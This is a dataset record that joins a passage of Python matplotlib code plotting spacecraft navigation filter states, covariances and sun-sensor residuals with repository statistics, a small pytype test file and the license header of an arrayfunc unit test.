plt.subplot(322)
plt.plot(t , x[:, 4], "b")
plt.plot(t , 3 * np.sqrt(P[:, 3, 3]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 3, 3]), 'r--')
plt.ylabel('$\dot{d}_x$(m)')
plt.title('First rate component')
plt.grid()
plt.subplot(323)
plt.plot(t , x[:, 2], "b")
plt.plot(t , 3 * np.sqrt(P[:, 1, 1]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 1, 1]), 'r--')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(324)
plt.plot(t , x[:, 5], "b")
plt.plot(t , 3 * np.sqrt(P[:, 4, 4]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 4, 4]), 'r--')
plt.ylabel('$\dot{d}_y$(m)')
plt.title('Second rate component')
plt.grid()
plt.subplot(325)
plt.plot(t , x[:, 3], "b")
plt.plot(t , 3 * np.sqrt(P[:, 2, 2]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 2, 2]), 'r--')
plt.ylabel('$d_z$(m)')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
plt.subplot(326)
plt.plot(t , x[:, 6], "b")
plt.plot(t , 3 * np.sqrt(P[:, 5, 5]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 5, 5]), 'r--')
plt.ylabel('$\dot{d}_z$(m)')
plt.xlabel('t(s)')
plt.title('Third rate component')
plt.grid()
if nstates == 3:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(311)
plt.plot(t, x[:, 1], "b", label='Error Filter')
plt.plot(t, 3 * np.sqrt(P[:, 0, 0]), 'r--', label='Covar Filter')
plt.plot(t, -3 * np.sqrt(P[:, 0, 0]), 'r--')
plt.legend(loc='best')
plt.ylabel('$d_x$(m)')
plt.title('First LOS component')
plt.grid()
plt.subplot(312)
plt.plot(t, x[:, 2], "b")
plt.plot(t, 3 * np.sqrt(P[:, 1, 1]), 'r--')
plt.plot(t, -3 * np.sqrt(P[:, 1, 1]), 'r--')
plt.ylabel('$d_y$(m)')
plt.title('Second LOST component')
plt.grid()
plt.subplot(313)
plt.plot(t, x[:, 3], "b")
plt.plot(t, 3 * np.sqrt(P[:, 2, 2]), 'r--')
plt.plot(t, -3 * np.sqrt(P[:, 2, 2]), 'r--')
plt.ylabel('$d_z$(m)')
plt.title('Third LOS component')
plt.grid()
if nstates == 5:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(321)
plt.plot(t , x[:, 1], "b", label='Error Filter')
plt.plot(t , 3 * np.sqrt(P[:, 0, 0]), 'r--', label='Covar Filter')
plt.plot(t , -3 * np.sqrt(P[:, 0, 0]), 'r--')
plt.legend(loc='best')
plt.ylabel('$d_x$(m)')
plt.title('First LOS component')
plt.grid()
plt.subplot(323)
plt.plot(t , x[:, 2], "b")
plt.plot(t , 3 * np.sqrt(P[:, 1, 1]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 1, 1]), 'r--')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(324)
plt.plot(t , x[:, 3], "b")
plt.plot(t , 3 * np.sqrt(P[:, 3, 3]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 3, 3]), 'r--')
plt.ylabel('$\omega_y$(m)')
plt.title('Second rate component')
plt.grid()
plt.subplot(325)
plt.plot(t , x[:, 3], "b")
plt.plot(t , 3 * np.sqrt(P[:, 2, 2]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 2, 2]), 'r--')
plt.ylabel('$d_z$(m)')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
plt.subplot(326)
plt.plot(t , x[:, 5], "b")
plt.plot(t , 3 * np.sqrt(P[:, 4, 4]), 'r--')
plt.plot(t , -3 * np.sqrt(P[:, 4, 4]), 'r--')
plt.ylabel('$\omega_z$(m)')
plt.xlabel('t(s)')
plt.title('Third rate component')
plt.grid()
unitTestSupport.saveScenarioFigure('scenario_Filters_StatesPlot'+FilterType, plt, path)
if show_plots:
plt.show()
plt.close('all')
def StatesPlotCompare(x, x2, Pflat, Pflat2, FilterType, show_plots, saveFigures):
nstates = int(np.sqrt(len(Pflat[0,:])-1))
P = np.zeros([len(Pflat[:,0]),nstates,nstates])
P2 = np.zeros([len(Pflat[:,0]),nstates,nstates])
t= np.zeros(len(Pflat[:,0]))
for i in range(len(Pflat[:,0])):
t[i] = x[i, 0]*1E-9
P[i,:,:] = Pflat[i,1:(nstates*nstates +1)].reshape([nstates,nstates])
P2[i, :, :] = Pflat2[i, 1:(nstates*nstates +1)].reshape([nstates, nstates])
if nstates == 6:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(321)
plt.plot(t[0:30] , x[0:30, 1], "b", label='Error Filter')
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 0, 0]), 'r--', label='Covar Filter')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 0, 0]), 'r--')
plt.plot(t[0:30] , x2[0:30, 1], "g", label='Error Expected')
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 0, 0]), 'c--', label='Covar Expected')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 0, 0]), 'c--')
plt.legend(loc='best')
plt.ylabel('$d_x$(m)')
plt.title('First LOS component')
plt.grid()
plt.subplot(322)
plt.plot(t[0:30] , x[0:30, 4], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 3, 3]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 3, 3]), 'r--')
plt.plot(t[0:30] , x2[0:30, 4], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
plt.ylabel('$\dot{d}_x$(m)')
plt.title('First rate component')
plt.grid()
plt.subplot(323)
plt.plot(t[0:30] , x[0:30, 2], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 1, 1]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 1, 1]), 'r--')
plt.plot(t[0:30] , x2[0:30, 2], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(324)
plt.plot(t[0:30] , x[0:30, 5], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 4, 4]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 4, 4]), 'r--')
plt.plot(t[0:30] , x2[0:30, 5], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
plt.ylabel('$\dot{d}_y$(m)')
plt.title('Second rate component')
plt.grid()
plt.subplot(325)
plt.plot(t[0:30] , x[0:30, 3], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 2, 2]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 2, 2]), 'r--')
plt.plot(t[0:30] , x2[0:30, 3], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
plt.ylabel('$d_z$(m)')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
plt.subplot(326)
plt.plot(t[0:30] , x[0:30, 6], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 5, 5]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 5, 5]), 'r--')
plt.plot(t[0:30] , x2[0:30, 6], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 5, 5]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 5, 5]), 'c--')
plt.ylabel('$\dot{d}_z$(m)')
plt.xlabel('t(s)')
plt.title('Third rate component')
plt.grid()
if nstates == 3:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(311)
plt.plot(t[0:30], x[0:30, 1], "b", label='Error Filter')
plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 0, 0]), 'r--', label='Covar Filter')
plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 0, 0]), 'r--')
plt.plot(t[0:30], x2[0:30, 1], "g", label='Error Expected')
plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 0, 0]), 'c--', label='Covar Expected')
plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 0, 0]), 'c--')
plt.ylabel('$d_x$(m)')
plt.legend(loc='best')
plt.title('First LOS component')
plt.grid()
plt.subplot(312)
plt.plot(t[0:30], x[0:30, 2], "b")
plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 1, 1]), 'r--')
plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 1, 1]), 'r--')
plt.plot(t[0:30], x2[0:30, 2], "g")
plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(313)
plt.plot(t[0:30], x[0:30, 3], "b")
plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 2, 2]), 'r--')
plt.plot(t[0:30], -3 * np.sqrt(P[0:30, 2, 2]), 'r--')
plt.plot(t[0:30], x2[0:30, 3], "g")
plt.plot(t[0:30], 3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
plt.plot(t[0:30], -3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
plt.ylabel('$d_z$(m)')
plt.title('Third LOS component')
plt.grid()
if nstates == 5:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(321)
plt.plot(t[0:30] , x[0:30, 1], "b", label='Error Filter')
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 0, 0]), 'r--', label='Covar Filter')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 0, 0]), 'r--')
plt.plot(t[0:30] , x2[0:30, 1], "g", label='Error Expected')
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 0, 0]), 'c--', label='Covar Expected')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 0, 0]), 'c--')
plt.legend(loc='best')
plt.ylabel('$d_x$(m)')
plt.title('First LOS component')
plt.grid()
plt.subplot(323)
plt.plot(t[0:30] , x[0:30, 2], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 1, 1]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 1, 1]), 'r--')
plt.plot(t[0:30] , x2[0:30, 2], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 1, 1]), 'c--')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(324)
plt.plot(t[0:30] , x[0:30, 4], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 3, 3]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 3, 3]), 'r--')
plt.plot(t[0:30] , x2[0:30, 4], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 3, 3]), 'c--')
plt.ylabel('$\omega_y$(m)')
plt.title('Second rate component')
plt.grid()
plt.subplot(325)
plt.plot(t[0:30] , x[0:30, 3], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 2, 2]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 2, 2]), 'r--')
plt.plot(t[0:30] , x2[0:30, 3], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 2, 2]), 'c--')
plt.ylabel('$d_z$(m)')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
plt.subplot(326)
plt.plot(t[0:30] , x[0:30, 5], "b")
plt.plot(t[0:30] , 3 * np.sqrt(P[0:30, 4, 4]), 'r--')
plt.plot(t[0:30] , -3 * np.sqrt(P[0:30, 4, 4]), 'r--')
plt.plot(t[0:30] , x2[0:30, 5], "g")
plt.plot(t[0:30] , 3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
plt.plot(t[0:30] , -3 * np.sqrt(P2[0:30, 4, 4]), 'c--')
plt.ylabel('$\omega_z$(m)')
plt.xlabel('t(s)')
plt.title('Third rate component')
plt.grid()
unitTestSupport.saveScenarioFigure('scenario_Filters_StatesCompare'+FilterType, plt, path)
if show_plots:
plt.show()
plt.close()
def numMeasurements(numObs, FilterType, show_plots, saveFigures):
plt.plot(111)
plt.plot(numObs[:,0]*(1E-9) , numObs[:, 1], "b")
plt.ylim([0,5])
plt.xlabel('t(s)')
plt.title('Number of Activated CSS')
if saveFigures:
unitTestSupport.saveScenarioFigure('scenario_Filters_Obs'+ FilterType, plt, path)
if show_plots:
plt.show()
plt.close()
def PostFitResiduals(Res, noise, FilterType, show_plots, saveFigures):
MeasNoise = np.zeros(len(Res[:,0]))
t= np.zeros(len(Res[:,0]))
constantVal = np.array([np.nan]*4)
for i in range(len(Res[:,0])):
t[i] = Res[i, 0]*1E-9
MeasNoise[i] = 3*noise
# Don't plot constant values, they mean no measurement is taken
if i>0:
for j in range(1,5):
with np.errstate(invalid='ignore'):
constantRes = np.abs(Res[i,j]-Res[i-1,j])
if constantRes < 1E-10 or np.abs(constantVal[j-1] - Res[i,j])<1E-10:
constantVal[j-1] = Res[i, j]
Res[i, j] = np.nan
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(411)
plt.plot(t , Res[:, 1], "b.", label='Residual')
plt.plot(t , MeasNoise, 'r--', label='Covar')
plt.plot(t , -MeasNoise, 'r--')
plt.legend(loc='best')
plt.ylabel('$r_1$(m)')
plt.ylim([-5*noise, 5*noise])
plt.title('First CSS')
plt.subplot(412)
plt.plot(t , Res[:, 2], "b.")
plt.plot(t , MeasNoise, 'r--')
plt.plot(t , -MeasNoise, 'r--')
plt.ylabel('$r_2$(m)')
plt.ylim([-5*noise, 5*noise])
plt.title('Second CSS')
plt.subplot(413)
plt.plot(t , Res[:, 3], "b.")
plt.plot(t , MeasNoise, 'r--')
plt.plot(t , -MeasNoise, 'r--')
plt.ylabel('$r_3$(m)')
plt.ylim([-5*noise, 5*noise])
plt.title('Third CSS')
plt.subplot(414)
plt.plot(t , Res[:, 4], "b.")
plt.plot(t , MeasNoise, 'r--')
plt.plot(t , -MeasNoise, 'r--')
plt.ylim([-5*noise, 5*noise])
plt.ylabel('$r_4$(m)')
plt.xlabel('t(s)')
plt.title('Fourth CSS')
if saveFigures:
unitTestSupport.saveScenarioFigure('scenario_Filters_PostFit'+ FilterType, plt, path)
if show_plots:
plt.show()
plt.close()
def StatesVsExpected(stateLog, Pflat, expectedStateArray, FilterType, show_plots, saveFigures):
nstates = int(np.sqrt(len(Pflat[0,:])-1))
P = np.zeros([len(Pflat[:, 0]), nstates, nstates])
for i in range(len(Pflat[:, 0])):
P[i, :, :] = Pflat[i, 1:(nstates*nstates +1)].reshape([nstates, nstates])
for j in range(len(P[0,0,:])):
P[i,j,j] = np.sqrt(P[i,j,j])
if nstates ==6:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(321)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 1], 'k--', label='Expected')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] + P[:,0,0], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] - P[:,0,0], 'r--', label='Covar')
plt.legend(loc='best')
plt.ylabel('$d_x$(m)')
plt.title('First LOS component')
plt.grid()
plt.subplot(322)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 4], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] + P[:,3,3], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] - P[:,3,3], 'r--', label='Covar')
plt.ylabel('$\dot{d}_x$(m)')
plt.title('First rate component')
plt.grid()
plt.subplot(323)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 2], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] + P[:,1,1], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] - P[:,1,1], 'r--', label='Covar')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(324)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 5], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] + P[:,4,4], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] - P[:,4,4], 'r--', label='Covar')
plt.ylabel('$\dot{d}_y$(m)')
plt.title('Second rate component')
plt.grid()
plt.subplot(325)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 3], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] + P[:,2,2], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] - P[:,2,2], 'r--', label='Covar')
plt.ylabel('$d_z$(m)')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
plt.subplot(326)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 6], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6] + P[:,5,5], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6] - P[:,5,5], 'r--', label='Covar')
plt.ylabel('$\dot{d}_z$(m)')
plt.xlabel('t(s)')
plt.title('Third rate component')
plt.grid()
if nstates ==3:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(311)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 1], 'k--', label='Expected')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] + P[:, 0, 0], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] - P[:, 0, 0], 'r--', label='Covar')
plt.ylabel('$d_x$(m)')
plt.legend(loc='best')
plt.title('First LOS component')
plt.grid()
plt.subplot(312)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 2], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] + P[:, 1, 1], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] - P[:, 1, 1], 'r--', label='Covar')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(313)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 3], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] + P[:, 2, 2], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] - P[:, 2, 2], 'r--', label='Covar')
plt.ylabel('$d_z$(m)')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
if nstates ==5:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(321)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 1], 'k--', label='Expected')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] + P[:,0,0], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1] - P[:,0,0], 'r--', label='Covar')
plt.legend(loc='best')
plt.ylabel('$d_x$(m)')
plt.title('First LOS component')
plt.grid()
plt.subplot(323)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 2], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] + P[:,1,1], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2] - P[:,1,1], 'r--', label='Covar')
plt.ylabel('$d_y$(m)')
plt.title('Second LOS component')
plt.grid()
plt.subplot(324)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 4], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] + P[:,3,3], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4] - P[:,3,3], 'r--', label='Covar')
plt.ylabel('$\omega_y$(m)')
plt.title('Second rate component')
plt.grid()
plt.subplot(325)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 3], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] + P[:,2,2], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3] - P[:,2,2], 'r--', label='Covar')
plt.ylabel('$d_z$(m)')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
plt.subplot(326)
plt.plot(stateLog[:, 0] * 1.0E-9, expectedStateArray[:, 5], 'k--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] + P[:,4,4], 'r--')
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5] - P[:,4,4], 'r--', label='Covar')
plt.ylabel('$\omega_z$(m)')
plt.xlabel('t(s)')
plt.title('Third rate component')
plt.grid()
if saveFigures:
unitTestSupport.saveScenarioFigure('scenario_Filters_StatesExpected' + FilterType , plt, path)
if show_plots:
plt.show()
plt.close()
def StatesVsTargets(target1, target2, stateLog, FilterType, show_plots, saveFigures):
nstates = int(stateLog[0,:])
target = np.ones([len(stateLog[:, 0]),nstates])
for i in range((len(stateLog[:, 0])-1)/2):
target[i, :] = target1
target[i+(len(stateLog[:, 0]) - 1) / 2,:] = target2
if nstates == 6:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(321)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 0], 'r--', label='Expected')
plt.legend(loc='best')
plt.title('First LOS component')
plt.grid()
plt.subplot(322)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 4], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 3], 'r--')
plt.title('First rate component')
plt.grid()
plt.subplot(323)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 1], 'r--')
plt.title('Second LOS component')
plt.grid()
plt.subplot(324)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 5], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 4], 'r--')
plt.title('Second rate component')
plt.grid()
plt.subplot(325)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 2], 'r--')
plt.xlabel('t(s)')
plt.title('Third LOS component')
plt.grid()
plt.subplot(326)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 6], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 5], 'r--')
plt.xlabel('t(s)')
plt.title('Third rate component')
plt.grid()
if nstates == 3:
plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
plt.subplot(311)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 1], 'b', label='Filter')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 0], 'r--', label='Expected')
plt.legend(loc='best')
plt.title('First LOS component')
plt.grid()
plt.subplot(312)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 2], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 1], 'r--')
plt.title('Second rate component')
plt.grid()
plt.subplot(313)
plt.plot(stateLog[:, 0] * 1.0E-9, stateLog[:, 3], 'b')
plt.plot(stateLog[:, 0] * 1.0E-9, target[:, 2], 'r--')
plt.title('Third LOS component')
plt.grid()
if saveFigures:
unitTestSupport.saveScenarioFigure('scenario_Filters_StatesTarget' + FilterType, plt, path)
if show_plots:
plt.show()
plt.close()
| 39.06278
| 102
| 0.499024
| 4,167
| 26,133
| 3.111831
| 0.056156
| 0.115524
| 0.085139
| 0.058302
| 0.871906
| 0.863885
| 0.853628
| 0.836431
| 0.832344
| 0.81129
| 0
| 0.083166
| 0.257376
| 26,133
| 669
| 103
| 39.06278
| 0.584995
| 0.002334
| 0
| 0.860465
| 0
| 0
| 0.107498
| 0.005585
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010733
| false
| 0
| 0.007156
| 0
| 0.017889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc773f8c591c7262827dab107b4c8b26a9140de4
| 297
|
py
|
Python
|
pytype/test_data/complex.py
|
OrBin/pytype
|
52bf1b5b03e6c3caf39bf0f187980970d70fd536
|
[
"Apache-2.0"
] | 3,882
|
2015-03-22T12:17:15.000Z
|
2022-03-31T17:13:20.000Z
|
pytype/test_data/complex.py
|
OrBin/pytype
|
52bf1b5b03e6c3caf39bf0f187980970d70fd536
|
[
"Apache-2.0"
] | 638
|
2015-11-03T06:34:44.000Z
|
2022-03-31T23:41:48.000Z
|
pytype/test_data/complex.py
|
OrBin/pytype
|
52bf1b5b03e6c3caf39bf0f187980970d70fd536
|
[
"Apache-2.0"
] | 301
|
2015-08-14T10:21:17.000Z
|
2022-03-08T11:03:40.000Z
|
"""Too-complex program."""
v = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
w = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
x = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
y = [0, 0.1, 1j, "foo", slice(0, 3), u"foo", None, type, max]
z = zip(v, w, x, y)
| 33
| 61
| 0.501684
| 65
| 297
| 2.292308
| 0.292308
| 0.053691
| 0.080537
| 0.134228
| 0.805369
| 0.805369
| 0.805369
| 0.805369
| 0.805369
| 0.805369
| 0
| 0.100418
| 0.195286
| 297
| 8
| 62
| 37.125
| 0.523013
| 0.06734
| 0
| 0
| 0
| 0
| 0.088561
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc82ba0b79e55d8d01eb06490997380cad8532d7
| 173,959
|
py
|
Python
|
unittest/test_convert.py
|
m1griffin/arrayfunc
|
df57097699c25d3e949e1ade307ed61eaa5728c2
|
[
"Apache-2.0"
] | 2
|
2017-08-28T08:41:16.000Z
|
2018-05-29T03:49:36.000Z
|
unittest/test_convert.py
|
m1griffin/arrayfunc
|
df57097699c25d3e949e1ade307ed61eaa5728c2
|
[
"Apache-2.0"
] | null | null | null |
unittest/test_convert.py
|
m1griffin/arrayfunc
|
df57097699c25d3e949e1ade307ed61eaa5728c2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
##############################################################################
# Project: arrayfunc
# Module: test_convert.py
# Purpose: arrayfunc unit test.
# Language: Python 3.4
# Date: 22-Jun-2014.
# Ver: 06-Mar-2020.
#
###############################################################################
#
# Copyright 2014 - 2020 Michael Griffin <m12.griffin@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
